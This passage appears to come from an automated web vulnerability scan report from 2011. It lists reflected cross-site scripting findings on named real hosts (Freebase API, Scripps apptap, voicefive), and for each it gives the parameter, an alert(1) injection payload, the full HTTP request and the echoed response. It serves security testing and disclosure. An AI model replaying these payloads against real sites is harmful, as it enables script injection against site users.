Expires: Thu, 12 May 2011 13:31:02 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3247977<script>alert(1)</script>52d97883a5d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051"
}

2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d16ee<script>alert(1)</script>9f14939b273 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32&mode=fillcropd16ee<script>alert(1)</script>9f14939b273 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:35Z;0020
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropd16ee<script>alert(1)</script>9f14939b273"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropd16ee<script>
...[SNIP]...

2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 1bc9a<script>alert(1)</script>03308122bf6 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=321bc9a<script>alert(1)</script>03308122bf6&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:12 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.011, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:13 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321bc9a<script>alert(1)</script>03308122bf6"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086"
}

2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 98742<script>alert(1)</script>4e597d81c40 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=3298742<script>alert(1)</script>4e597d81c40&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:58 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.013, maxrss=8, mcs=0.0, mcu=0.0, minflt=2, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:59 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3298742<script>alert(1)</script>4e597d81c40"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023"
}

2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 31f0b<script>alert(1)</script>51e1e21b763 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=32&mode=fillcrop31f0b<script>alert(1)</script>51e1e21b763 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:31 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:32 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:31Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop31f0b<script>alert(1)</script>51e1e21b763"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop31f0b<script>
...[SNIP]...

2.67. http://apptap.scripps.com/apptap3 [app parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 250f0'%3balert(1)//3099540a5f4 was submitted in the app parameter. This input was echoed as 250f0';alert(1)//3099540a5f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff250f0'%3balert(1)//3099540a5f4&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF250F0';ALERT(1)//3099540A5F4' ;
            //ref = document.ref
...[SNIP]...
ers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF250F0';ALERT(1)//3099540A5F4" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP"
...[SNIP]...

2.68. http://apptap.scripps.com/apptap3 [app parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the app request parameter is copied into a JavaScript rest-of-line comment. The payload 4b22f%0aalert(1)//da968e7ee99 was submitted in the app parameter. This input was echoed as 4b22f
alert(1)//da968e7ee99
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff4b22f%0aalert(1)//da968e7ee99&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF4B22F
ALERT(1)//DA968E7EE99
' ;
            //ref = document.referrer ;
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t();if(s_code)document.write(s_code);
   //if(navigator.appVersion.index
...[SNIP]...

2.69. http://apptap.scripps.com/apptap3 [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the path request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a0736%3balert(1)//c6592984475 was submitted in the path parameter. This input was echoed as a0736;alert(1)//c6592984475 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-pppppa0736%3balert(1)//c6592984475&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48334


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
return h;
}

function __addSlashes(n){
   var p = /[']/g;
   c = n.replace(p,"\'");
   p = /["]/g;
   c = c.replace(p,'\"');
   return c
}


var path = "ENTERTAINMENT/LOCAL/ARTICLE/HEDER-HERE-IN-THIS-SPP-PPPPPA0736;ALERT(1)//C6592984475"
var search_terms = ''

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Omniture, Inc. More info available at
http://www.omniture.com */
/* You may give each page an identifying name, server
...[SNIP]...

2.70. http://apptap.scripps.com/apptap3 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 807ab%3balert(1)//eaad520ff04 was submitted in the site parameter. This input was echoed as 807ab;alert(1)//eaad520ff04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP807ab%3balert(1)//eaad520ff04&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48362


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
op6 = chunk
           if( vidx == 3 ) s.prop7 = chunk
           if( vidx == 4 ) s.prop8 = chunk
           if( vidx == 5 ) s.prop9 = chunk
           h1chunks.push( chunk )
       }
   }
   s.hier1 = h1chunks.join( ":" ) ;
   s.prop19 = "ECP807AB;ALERT(1)//EAAD520FF04:" + s.hier1 ;
   s.hier2= s.hier1

s.prop10 = '' || document.location.href.replace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^ww
...[SNIP]...

2.71. http://apptap.scripps.com/apptap3 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa207'-alert(1)-'da0583d3123 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECPaa207'-alert(1)-'da0583d3123&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48364


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest work"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECPAA207'-ALERT(1)-'DA0583D3123" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /*
...[SNIP]...

2.72. http://apptap.scripps.com/apptap3 [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1d142%3balert(1)//79efcb08617 was submitted in the title parameter. This input was echoed as 1d142;alert(1)//79efcb08617 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=1d142%3balert(1)//79efcb08617&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48270


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
(mediaName,mediaOffset);
}
function sc_mediaStop(mediaName,mediaOffset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "1d142;alert(1)//79efcb08617"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...

2.73. http://apptap.scripps.com/apptap3 [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36f2'%3balert(1)//989b401414d was submitted in the title parameter. This input was echoed as b36f2';alert(1)//989b401414d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20workb36f2'%3balert(1)//989b401414d&k=v&topic=Entertainment+%28NPC%29 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48335


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
Offset){
s.Media.stop(mediaName,mediaOffset);
}
function sc_mediaClose(mediaName){
s.Media.close(mediaName);
}

sc_target( path, "Friday 13th double feature screens local filmmakers' latest workb36f2';alert(1)//989b401414d"||document.title ) ;
s.server=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

...[SNIP]...

2.74. http://apptap.scripps.com/apptap3 [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23503'-alert(1)-'9f9ccb9ac54 was submitted in the topic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%2923503'-alert(1)-'9f9ccb9ac54 HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48363


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
=""
s.pageType=""
s.prop1="" /* market */
s.prop2="" /* BU */
s.prop3="ECP" /* set by omniture universal library... s.prop3="" */
s.prop4="DJEFF" /* app */

s.prop16="Entertainment (NPC)23503'-alert(1)-'9f9ccb9ac54" /* topic */
s.prop20="" /* gender */
s.prop21="" /* age */
s.prop22="" /* city */
s.prop23="" /* state */
s.prop24="" /* zip */

s.prop30="ECP" /* Business Unit */


s.prop43="{{AUTHOR}}"
...[SNIP]...

2.75. http://apptap.scripps.com/apptap3 [topic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apptap.scripps.com
Path:   /apptap3

Issue detail

The value of the topic request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7b401%3balert(1)//eea6590349d was submitted in the topic parameter. This input was echoed as 7b401;alert(1)//eea6590349d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apptap3?site=ECP&app=djeff&path=/entertainment/local/article/heder-here-in-this-spp-ppppp&title=Friday%2013th%20double%20feature%20screens%20local%20filmmakers'%20latest%20work&k=v&topic=Entertainment+%28NPC%297b401%3balert(1)//eea6590349d HTTP/1.1
Host: apptap.scripps.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:01 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 48361


           function apptap4(){
               apptap();
               }
           function apptap() {
            //statbug = new Image( 1,1 ) ;
            //app = 'DJEFF' ;
            //ref = document.referrer ;
       /************* DO
...[SNIP]...
ace( /\?.*$/, '' ) ;
s.prop10 = s.prop10.replace( /https?:\/\//, '' ) ;
   s.prop10 = s.prop10.replace( /^www\./, '' ) ;

s.prop14 = search_terms ;
s.prop16 = "Entertainment (NPC)7b401;alert(1)//eea6590349d"

if( window.yld_mgr && window.yld_mgr.slots ) {
s.prop44 = 1 ; // are there yahoo ads?
var qty = 0 ;
for( x in window.yld_mgr.slots ) {
qty
...[SNIP]...

2.76. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f55d4<script>alert(1)</script>861c9a51b7f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf55d4<script>alert(1)</script>861c9a51b7f&n=ar_int_p82806590&1305206907376 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
